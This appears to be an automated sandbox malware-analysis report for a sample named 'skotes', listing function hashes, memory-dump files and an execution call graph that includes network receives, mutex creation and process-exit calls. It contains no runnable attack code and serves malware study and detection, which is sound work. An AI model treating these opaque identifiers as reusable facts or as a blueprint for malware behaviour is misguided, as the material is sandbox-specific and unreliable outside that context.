                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID: 0#
                                                                                                                                                                                                                                                  • API String ID: 3213747228-476050247
                                                                                                                                                                                                                                                  • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                  • Instruction ID: 396a1b089a826520f76764278c340bc514f22139913bc94740d2b8b13a7ad802
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AB105329046459FEB25CF68C881FFEBBE5EF56340F14816EE859EB242D6349D41CB60
                                                                                                                                                                                                                                                  Function 00092EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1418687624-0
                                                                                                                                                                                                                                                  • Opcode ID: 9a4f79fc42ccc09e722bd26428c0bdd229b70a744b272172f88287294d083a6f
                                                                                                                                                                                                                                                  • Instruction ID: 3084187b41f8b72fa15150e29bea89bfc8f8afaf0a0c8d5d7a06f716021be4d6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4f79fc42ccc09e722bd26428c0bdd229b70a744b272172f88287294d083a6f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABA1C171A01605AFEF21DFA4C945BAAB7F8FF15310F048139E816D7252EB35EA04DB91

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:0.9%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:606
                                                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                                                  execution_graph 10126 93c8e 10127 93c98 10126->10127 10128 92410 4 API calls 10127->10128 10129 93ca5 10127->10129 10128->10129 10130 93810 3 API calls 10129->10130 10131 93ccf 10130->10131 10132 93810 3 API calls 10131->10132 10133 93cdb shared_ptr 10132->10133 9697 c6a44 9698 c6a5c 9697->9698 9699 c6a52 9697->9699 9702 c698d 9698->9702 9701 c6a76 __freea 9705 c690a 9702->9705 9704 c699f 9704->9701 9706 c692a 9705->9706 9707 c6921 9705->9707 9706->9707 9713 ca671 9706->9713 9707->9704 9717 ca67b __dosmaperr __freea 9713->9717 9714 c694a 9718 cb5fb 9714->9718 9717->9714 9726 c8bec 9717->9726 9719 cb60e 9718->9719 9720 c6960 9718->9720 9719->9720 9752 cf5ab 9719->9752 9722 cb628 9720->9722 9723 cb63b 9722->9723 9724 cb650 9722->9724 9723->9724 9759 ce6b1 9723->9759 9724->9707 9727 c8bf1 __cftof 9726->9727 9731 c8bfc ___std_exception_copy 9727->9731 9732 cd634 9727->9732 9746 c65ed 9731->9746 9734 cd640 __cftof __dosmaperr 9732->9734 9733 cd69c __dosmaperr ___std_exception_copy 9733->9731 9734->9733 9735 cd81b __dosmaperr 9734->9735 9736 cd726 9734->9736 9737 cd751 __cftof 9734->9737 9738 c65ed __cftof 3 API calls 9735->9738 9736->9737 9749 cd62b 9736->9749 9737->9733 9741 ca671 __cftof 3 API calls 9737->9741 9744 cd7a5 9737->9744 9740 cd82e 9738->9740 9741->9744 9743 cd62b __cftof 3 API calls 9743->9737 9744->9733 9745 ca671 __cftof 3 API calls 9744->9745 9745->9733 9747 c64c7 __cftof 3 API calls 9746->9747 9748 c65fe 9747->9748 9750 ca671 __cftof 3 API calls 9749->9750 9751 cd630 9750->9751 9751->9743 9753 cf5b7 __dosmaperr 9752->9753 9754 ca671 __cftof 3 API calls 9753->9754 9755 cf5c0 __cftof __dosmaperr 9754->9755 9756 cf606 9755->9756 9757 c8bec __cftof 3 API calls 9755->9757 9756->9720 9758 cf62b 9757->9758 9760 ca671 __cftof 3 API calls 9759->9760 9761 ce6bb 9760->9761 9764 ce5c9 9761->9764 9763 ce6c1 9763->9724 9765 ce5d5 __cftof __dosmaperr __freea 9764->9765 9766 ce5f6 9765->9766 9767 c8bec __cftof 3 API calls 9765->9767 9766->9763 9768 ce668 9767->9768 9772 ce6a4 9768->9772 9773 ca72e 9768->9773 9772->9763 9777 ca739 __dosmaperr __freea 9773->9777 9774 c8bec __cftof 3 API calls 9775 ca7c7 9774->9775 9776 ca7be 9778 ce4b0 9776->9778 9777->9774 9777->9776 9779 ce5c9 __cftof 3 API calls 9778->9779 9780 ce4c3 9779->9780 9785 ce259 9780->9785 9782 ce4cb __cftof 9784 ce4dc __cftof __dosmaperr __freea 9782->9784 9788 ce6c4 9782->9788 9784->9772 9786 c690a __cftof 3 API calls 9785->9786 9787 ce26b 9786->9787 9787->9782 9789 ce259 __cftof 3 API calls 9788->9789 9792 ce6e4 __cftof 9789->9792 9790 ce75a __cftof __floor_pentium4 9790->9784 9792->9790 9793 ce32f 9792->9793 9794 ce420 __floor_pentium4 9793->9794 9795 ce357 9793->9795 9794->9790 9795->9794 9801 cf1bf 9795->9801 9797 ce3d7 9804 d4dfe 9797->9804 9799 ce3f8 9800 d4dfe __cftof 3 API calls 9799->9800 9800->9794 9802 c690a __cftof 3 API calls 9801->9802 9803 cf1df __cftof __freea __floor_pentium4 9802->9803 9803->9797 9805 c690a __cftof 3 API calls 9804->9805 9806 d4e11 __cftof 9805->9806 9806->9799 9670 92e00 9671 92e28 9670->9671 9674 ac68b 9671->9674 9677 ac3d5 9674->9677 9676 92e33 9678 ac3eb 9677->9678 9679 ac3e1 9677->9679 9678->9676 9680 ac3be 9679->9680 9681 ac39e 9679->9681 9690 acd0a 9680->9690 9681->9678 9686 accd5 9681->9686 9683 ac3d0 9683->9676 9687 ac3b7 9686->9687 9688 acce3 InitializeCriticalSectionEx 9686->9688 9687->9676 9688->9687 9691 acd1f RtlInitializeConditionVariable 9690->9691 9691->9683 10196 9e0c0 recv 10197 9e122 recv 10196->10197 10198 9e157 recv 10197->10198 10200 9e191 10198->10200 10199 9e2b3 __floor_pentium4 10200->10199 10201 ac6ac GetSystemTimePreciseAsFileTime 10200->10201 10202 9e2ee 10201->10202 10203 ac26a 4 API calls 10202->10203 10204 9e358 10203->10204 10205 92ec0 10206 92f06 10205->10206 10209 92f6f 10205->10209 10207 ac6ac GetSystemTimePreciseAsFileTime 10206->10207 10208 92f12 10207->10208 10211 9301e 10208->10211 10215 92f1d __Mtx_unlock 10208->10215 10210 92fef 10209->10210 10216 ac6ac GetSystemTimePreciseAsFileTime 10209->10216 10212 ac26a 4 API calls 10211->10212 10213 93024 10212->10213 10214 ac26a 4 API calls 10213->10214 10217 92fb9 10214->10217 10215->10209 10215->10213 10216->10217 10218 ac26a 4 API calls 10217->10218 10219 92fc0 __Mtx_unlock 10217->10219 10218->10219 10220 ac26a 4 API calls 10219->10220 10221 92fd8 10219->10221 10220->10221 10221->10210 10222 ac26a 4 API calls 10221->10222 10223 9303c 10222->10223 10224 ac6ac GetSystemTimePreciseAsFileTime 10223->10224 10233 93080 shared_ptr __Mtx_unlock 10224->10233 10225 ac26a 4 API calls 10226 931cb 10225->10226 10227 ac26a 4 API calls 10226->10227 10228 931d1 10227->10228 10229 ac26a 4 API calls 10228->10229 10235 93193 __Mtx_unlock 10229->10235 10230 931a7 __floor_pentium4 10231 ac26a 4 API calls 10232 931dd 10231->10232 10233->10226 10233->10230 10234 ac6ac GetSystemTimePreciseAsFileTime 10233->10234 10236 9315f 10233->10236 10234->10236 10235->10230 10235->10231 10236->10225 10236->10228 10236->10235 10380 98980 10382 98aea 10380->10382 10383 989d8 shared_ptr 10380->10383 10381 95c10 3 API calls 10381->10383 10383->10381 10383->10382 10237 ad0c7 10238 ad0d7 10237->10238 10239 ad17f 10238->10239 10240 ad17b RtlWakeAllConditionVariable 10238->10240 10341 99f44 10342 99f4c shared_ptr 10341->10342 10343 9a953 Sleep CreateMutexA 10342->10343 10344 9a01f shared_ptr 10342->10344 10345 9a98e 10343->10345 9807 93c47 9808 93c51 9807->9808 9811 93c5f 9808->9811 9814 932d0 9808->9814 9809 93c68 9811->9809 9831 93810 9811->9831 9835 ac6ac 9814->9835 9817 9333c __Mtx_unlock 9819 ac26a 4 API calls 9817->9819 9821 93350 __floor_pentium4 9817->9821 9818 93314 9818->9817 9838 ac26a 9818->9838 9820 93377 9819->9820 9822 ac6ac GetSystemTimePreciseAsFileTime 9820->9822 9821->9811 9823 933af 9822->9823 9824 ac26a 4 API calls 9823->9824 9825 933b6 9823->9825 9824->9825 9826 ac26a 4 API calls 9825->9826 9827 933d7 __Mtx_unlock 9825->9827 9826->9827 9828 ac26a 4 API calls 9827->9828 9829 933eb 9827->9829 9830 9340e 9828->9830 9829->9811 9830->9811 9832 9381c 9831->9832 9876 92440 9832->9876 9842 ac452 9835->9842 9837 ac6b9 9837->9818 9839 ac292 9838->9839 9840 ac274 9838->9840 9839->9839 9840->9839 9859 ac297 9840->9859 9843 ac4a8 9842->9843 9845 ac47a __floor_pentium4 9842->9845 9843->9845 9848 acf6b 9843->9848 9845->9837 9846 ac4fd __Xtime_diff_to_millis2 9846->9845 9847 acf6b _xtime_get GetSystemTimePreciseAsFileTime 9846->9847 9847->9846 9849 acf7a 9848->9849 9851 acf87 __aulldvrm 9848->9851 9849->9851 9852 acf44 9849->9852 9851->9846 9855 acbea 9852->9855 9856 acbfb GetSystemTimePreciseAsFileTime 9855->9856 9857 acc07 9855->9857 9856->9857 9857->9851 9862 92ae0 9859->9862 9861 ac2ae Concurrency::cancel_current_task 9869 abedf 9862->9869 9864 92af4 __dosmaperr 9864->9861 9865 ca671 __cftof 3 API calls 9864->9865 9866 c6ccc 9865->9866 9867 c8bec __cftof 3 API calls 9866->9867 9868 c6cf6 9867->9868 9872 acc31 9869->9872 9873 acc3f InitOnceExecuteOnce 9872->9873 9875 abef2 9872->9875 9873->9875 9875->9864 9879 ab5d6 9876->9879 9878 92472 9881 ab5f1 Concurrency::cancel_current_task 9879->9881 9880 c8bec __cftof 3 API calls 9882 ab69f 9880->9882 9881->9880 9883 ab658 __cftof __floor_pentium4 9881->9883 9883->9878 10346 9215a 10349 ac6fc 10346->10349 10348 92164 10350 ac70c 10349->10350 10351 ac724 10349->10351 10350->10351 10353 acfbe 10350->10353 10351->10348 10354 accd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10353->10354 10355 acfd0 10354->10355 10355->10350 10241 99adc 10242 99aea 10241->10242 10246 99afe shared_ptr 10241->10246 10243 9a917 10242->10243 10242->10246 10244 9a953 Sleep CreateMutexA 10243->10244 10245 9a98e 10244->10245 10247 95c10 3 API calls 10246->10247 10248 99b7c 10247->10248 10249 98b30 3 API calls 10248->10249 10250 99b8d 10249->10250 10251 95c10 3 API calls 10250->10251 10252 99cb1 10251->10252 10253 98b30 3 API calls 10252->10253 10254 99cc2 10253->10254 10384 93f9f 10385 93fad 10384->10385 10386 93fb6 10384->10386 10387 92410 4 API calls 10385->10387 10387->10386 10259 92b10 10260 92b1a 10259->10260 10261 92b1c 10259->10261 10262 ac26a 4 API calls 10261->10262 10263 92b22 10262->10263 10388 92b90 10389 92bce 10388->10389 10390 ab7fb TpReleaseWork 10389->10390 10391 92bdb shared_ptr __floor_pentium4 10390->10391 10264 ad111 10265 ad122 10264->10265 10266 ad12a 10265->10266 10268 ad199 10265->10268 10269 ad1a7 SleepConditionVariableCS 10268->10269 10271 ad1c0 10268->10271 10269->10271 10271->10265 9665 9a856 9666 9a892 shared_ptr 9665->9666 9667 9a870 9665->9667 9667->9666 9668 9a953 Sleep CreateMutexA 9667->9668 9669 9a98e 9668->9669 10139 95cad 10141 95caf __cftof 10139->10141 10140 95d17 shared_ptr __floor_pentium4 10141->10140 10142 95c10 3 API calls 10141->10142 10143 966ac 10142->10143 10144 95c10 3 API calls 10143->10144 10145 966b1 10144->10145 10146 922c0 3 API calls 10145->10146 10147 966c9 shared_ptr 10146->10147 10148 95c10 3 API calls 10147->10148 10149 9673d 10148->10149 10150 922c0 3 API calls 10149->10150 10152 96757 shared_ptr 10150->10152 10151 95c10 3 API calls 10151->10152 10152->10151 10153 96852 shared_ptr __floor_pentium4 10152->10153 10154 922c0 3 API calls 10152->10154 10154->10152 9649 c6629 9652 c64c7 9649->9652 9653 c64d5 __cftof 9652->9653 9654 c6520 9653->9654 9657 c652b 9653->9657 9656 c652a 9663 ca302 GetPEB 9657->9663 9659 c6535 9660 c654a __cftof 9659->9660 9661 c653a GetPEB 9659->9661 9662 c6562 ExitProcess 9660->9662 9661->9660 9664 ca31c __cftof 9663->9664 9664->9659 10155 920a0 10156 ac68b __Mtx_init_in_situ 2 API calls 10155->10156 10157 920ac 10156->10157 10272 94120 10273 9416a 10272->10273 10275 941b2 __floor_pentium4 10273->10275 10276 93ee0 10273->10276 10277 93f48 10276->10277 10278 93f1e 10276->10278 10279 93f58 10277->10279 10282 92c00 10277->10282 10278->10275 10279->10275 10283 92c0e 10282->10283 10289 ab847 10283->10289 10285 92c42 10286 92c49 10285->10286 10295 92c80 10285->10295 10286->10275 10288 92c58 Concurrency::cancel_current_task 10290 ab854 10289->10290 10294 ab873 Concurrency::details::_Reschedule_chore 10289->10294 10298 acb77 10290->10298 10292 ab864 10292->10294 10300 ab81e 10292->10300 10294->10285 10306 ab7fb 10295->10306 10297 92cb2 shared_ptr 10297->10288 10299 acb92 CreateThreadpoolWork 10298->10299 10299->10292 10301 ab827 Concurrency::details::_Reschedule_chore 10300->10301 10304 acdcc 10301->10304 10303 ab841 10303->10294 10305 acde1 TpPostWork 10304->10305 10305->10303 10307 ab817 10306->10307 10308 ab807 10306->10308 10307->10297 10308->10307 10310 aca78 10308->10310 10311 aca8d TpReleaseWork 10310->10311 10311->10307 10406 93fe0 10407 94022 10406->10407 10408 9408c 10407->10408 10409 940d2 10407->10409 10412 94035 __floor_pentium4 10407->10412 10413 935e0 10408->10413 10410 93ee0 3 API calls 10409->10410 10410->10412 10414 93616 10413->10414 10418 9364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10414->10418 10419 92ce0 10414->10419 10416 9369e 10417 92c00 3 API calls 10416->10417 10416->10418 10417->10418 10418->10412 10420 92d1d 10419->10420 10421 abedf InitOnceExecuteOnce 10420->10421 10423 92d46 10421->10423 10422 92d88 10426 92440 3 API calls 10422->10426 10423->10422 10424 92d51 __floor_pentium4 10423->10424 10428 abef7 10423->10428 10424->10416 10427 92d9b 10426->10427 10427->10416 10429 abf03 Concurrency::cancel_current_task 10428->10429 10430 abf6a 10429->10430 10431 abf73 10429->10431 10435 abe7f 10430->10435 10433 92ae0 4 API calls 10431->10433 10434 abf6f 10433->10434 10434->10422 10436 acc31 InitOnceExecuteOnce 10435->10436 10438 abe97 10436->10438 10437 abe9e 10437->10434 10438->10437 10439 c6cbb 3 API calls 10438->10439 10440 abea7 10439->10440 10440->10434 10397 99ba5 10398 99ba7 10397->10398 10399 95c10 3 API calls 10398->10399 10400 99cb1 10399->10400 10401 98b30 3 API calls 10400->10401 10402 99cc2 10401->10402 9889 9cc79 9890 9cc84 shared_ptr 9889->9890 9891 9ccda shared_ptr __floor_pentium4 9890->9891 9895 95c10 9890->9895 9893 9ce9d 9913 9ca70 9893->9913 9896 95c54 9895->9896 9923 94b30 9896->9923 9898 95d17 shared_ptr __floor_pentium4 9898->9893 9899 95c7b __cftof 9899->9898 9900 95c10 3 API calls 9899->9900 9901 966ac 9900->9901 9902 95c10 3 API calls 9901->9902 9903 966b1 9902->9903 9927 922c0 9903->9927 9905 966c9 shared_ptr 9906 95c10 3 API calls 9905->9906 9907 9673d 9906->9907 9908 922c0 3 API calls 9907->9908 9910 96757 shared_ptr 9908->9910 9909 95c10 3 API calls 9909->9910 9910->9909 9911 96852 shared_ptr __floor_pentium4 9910->9911 9912 922c0 3 API calls 9910->9912 9911->9893 9912->9910 9916 9cadd 9913->9916 9914 9cc87 9915 9ccda shared_ptr __floor_pentium4 9914->9915 9920 95c10 3 API calls 9914->9920 9916->9914 9917 95c10 3 API calls 9916->9917 9918 9ccf9 9917->9918 10072 99030 9918->10072 9921 9ce9d 9920->9921 9922 9ca70 3 API calls 9921->9922 9925 94ce5 9923->9925 9926 94b92 9923->9926 9925->9899 9926->9925 9930 c6da6 9926->9930 9956 92280 9927->9956 9931 c6db4 9930->9931 9932 c6dc2 9930->9932 9935 c6d19 9931->9935 9932->9926 9936 c690a __cftof 3 API calls 9935->9936 9937 c6d2c 9936->9937 9940 c6d52 9937->9940 9939 c6d3d 9939->9926 9941 c6d8f 9940->9941 9942 c6d5f 9940->9942 9951 cb67d 9941->9951 9945 c6d6e 9942->9945 9946 cb6a1 9942->9946 9945->9939 9947 c690a __cftof 3 API calls 9946->9947 9948 cb6be 9947->9948 9949 cf1bf __cftof 3 API calls 9948->9949 9950 cb6ce __floor_pentium4 9948->9950 9949->9950 9950->9945 9952 ca671 __cftof 3 API calls 9951->9952 9953 cb688 9952->9953 9954 cb5fb __cftof 3 API calls 9953->9954 9955 cb698 9954->9955 9955->9945 9957 92296 9956->9957 9960 c87f8 9957->9960 9963 c7609 9960->9963 9962 922a4 9962->9905 9964 c7649 9963->9964 9968 c7631 __dosmaperr ___std_exception_copy __floor_pentium4 9963->9968 9965 c690a __cftof 3 API calls 9964->9965 9964->9968 9966 c7661 9965->9966 9969 c7bc4 9966->9969 9968->9962 9970 c7bd5 9969->9970 9971 c7be4 __dosmaperr ___std_exception_copy 9970->9971 9976 c8168 9970->9976 9981 c7dc2 9970->9981 9986 c7de8 9970->9986 9996 c7f36 9970->9996 9971->9968 9977 c8178 9976->9977 9978 c8171 9976->9978 9977->9970 10005 c7b50 9978->10005 9980 c8177 9980->9970 9982 c7dcb 9981->9982 9983 c7dd2 9981->9983 9984 c7b50 3 API calls 9982->9984 9983->9970 9985 c7dd1 9984->9985 9985->9970 9987 c7e09 __dosmaperr ___std_exception_copy 9986->9987 9990 c7def 9986->9990 9987->9970 9988 c7f69 9994 c7f77 9988->9994 9995 c7f8b 9988->9995 10023 c8241 9988->10023 9989 c7fa2 9989->9995 10019 c8390 9989->10019 9990->9987 9990->9988 9990->9989 9990->9994 9994->9995 10027 c86ea 9994->10027 9995->9970 9997 c7f4f 9996->9997 9998 c7f69 9996->9998 9997->9998 9999 c7fa2 9997->9999 10003 c7f77 9997->10003 10000 c8241 3 API calls 9998->10000 9998->10003 10004 c7f8b 9998->10004 10001 c8390 3 API calls 9999->10001 9999->10004 10000->10003 10001->10003 10002 c86ea 3 API calls 10002->10004 10003->10002 10003->10004 10004->9970 10006 c7b62 __dosmaperr 10005->10006 10009 c8ab6 10006->10009 10008 c7b85 __dosmaperr 10008->9980 10010 c8ad1 10009->10010 10013 c8868 10010->10013 10012 c8adb 10012->10008 10014 c887a 10013->10014 10015 c690a __cftof GetPEB ExitProcess GetPEB 10014->10015 10018 c888f __dosmaperr ___std_exception_copy 10014->10018 10017 c88bf 10015->10017 10016 c6d52 GetPEB ExitProcess GetPEB 10016->10017 10017->10016 10017->10018 10018->10012 10021 c83ab 10019->10021 10020 c83dd 10020->9994 10021->10020 10031 cc88e 10021->10031 10024 c825a 10023->10024 10038 cd3c8 10024->10038 10026 c830d 10026->9994 10026->10026 10029 c875d __floor_pentium4 10027->10029 10030 c8707 10027->10030 10028 cc88e __cftof 3 API calls 10028->10030 10029->9995 10030->10028 10030->10029 10034 cc733 10031->10034 10033 cc8a6 10033->10020 10035 cc743 10034->10035 10036 cc748 __cftof __dosmaperr ___std_exception_copy 10035->10036 10037 c690a __cftof GetPEB ExitProcess GetPEB 10035->10037 10036->10033 10037->10036 10039 cd3d8 __dosmaperr ___std_exception_copy 10038->10039 10042 cd3ee 10038->10042 10039->10026 10040 cd485 10044 cd4ae 10040->10044 10045 cd4e4 10040->10045 10041 cd48a 10051 ccbdf 10041->10051 10042->10039 10042->10040 10042->10041 10047 cd4cc 10044->10047 10048 cd4b3 10044->10048 10068 ccef8 10045->10068 10064 cd0e2 10047->10064 10057 cd23e 10048->10057 10052 ccbf1 10051->10052 10053 c690a __cftof GetPEB ExitProcess GetPEB 10052->10053 10054 ccc05 10053->10054 10055 ccef8 GetPEB ExitProcess GetPEB 10054->10055 10056 ccc0d __alldvrm __cftof __dosmaperr ___std_exception_copy _strrchr 10054->10056 10055->10056 10056->10039 10060 cd26c 10057->10060 10058 cd2a5 10058->10039 10059 cd2de 10061 ccf9a GetPEB ExitProcess GetPEB 10059->10061 10060->10058 10060->10059 10062 cd2b7 10060->10062 10061->10058 10063 cd16d GetPEB ExitProcess GetPEB 10062->10063 10063->10058 10066 cd10f 10064->10066 10065 cd14e 10065->10039 10066->10065 10067 cd16d GetPEB ExitProcess GetPEB 10066->10067 10067->10065 10069 ccf10 10068->10069 10070 ccf9a GetPEB ExitProcess GetPEB 10069->10070 10071 ccf75 10069->10071 10070->10071 10071->10039 10073 99080 10072->10073 10074 95c10 3 API calls 10073->10074 10075 9909a shared_ptr __floor_pentium4 10074->10075 10075->9914 10158 99ab8 10160 99acc 10158->10160 10161 99b08 10160->10161 10162 95c10 3 API calls 10161->10162 10163 99b7c 10162->10163 10170 98b30 10163->10170 10165 99b8d 10166 95c10 3 API calls 10165->10166 10167 99cb1 10166->10167 10168 98b30 3 API calls 10167->10168 10169 99cc2 10168->10169 10171 98b7c 10170->10171 10172 95c10 3 API calls 10171->10172 10173 98b97 shared_ptr 10172->10173 10174 98d01 shared_ptr __floor_pentium4 10173->10174 10175 95c10 3 API calls 10173->10175 10174->10165 10177 98d9a shared_ptr 10175->10177 10176 98e7e shared_ptr __floor_pentium4 10176->10165 10177->10176 10178 95c10 3 API calls 10177->10178 10179 98f1a shared_ptr __floor_pentium4 10178->10179 10179->10165 10403 c8bbe 10404 c8868 3 API calls 10403->10404 10405 c8bdc 10404->10405 10180 942b0 10183 93ac0 10180->10183 10182 942bb shared_ptr 10184 93af9 10183->10184 10186 932d0 5 API calls 10184->10186 10187 93b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10184->10187 10188 93c38 10184->10188 10185 932d0 5 API calls 10190 93c5f 10185->10190 10186->10188 10187->10182 10188->10185 10188->10190 10189 93c68 10189->10182 10190->10189 10191 93810 3 API calls 10190->10191 10192 93cdb shared_ptr 10191->10192 10192->10182 